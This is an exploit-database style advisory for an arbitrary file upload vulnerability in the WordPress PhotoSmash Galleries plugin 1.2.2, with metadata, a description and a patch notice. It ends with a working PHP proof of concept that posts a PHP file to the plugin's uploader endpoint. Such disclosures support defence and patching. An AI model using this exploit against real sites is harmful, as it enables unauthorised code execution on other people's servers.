PhotoSmash Galleries Plugin Arbitrary File Upload Vulnerability

vendor:

PhotoSmash Galleries Plugin

by:

SecurityFocus

7,5

CVSS

HIGH

Arbitrary File Upload Vulnerability

434

CWE

Product Name: PhotoSmash Galleries Plugin

Affected Version From: 1.2.2

Affected Version To: 1.2.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:wordpress:photosmash_galleries

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

PhotoSmash Galleries Plugin Arbitrary File Upload Vulnerability

The PhotoSmash Galleries plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Mitigation:

The vendor has released a patch to address this issue. Users are advised to upgrade to the latest version of the plugin.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/64173/info

The PhotoSmash Galleries plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<?php
$uploadfile="file.php";
$ch = curl_init("
http://www.example.com/wordpress/wp-content/plugins/photosmash-galleries/bwbps-uploader.php
");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('FileData'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>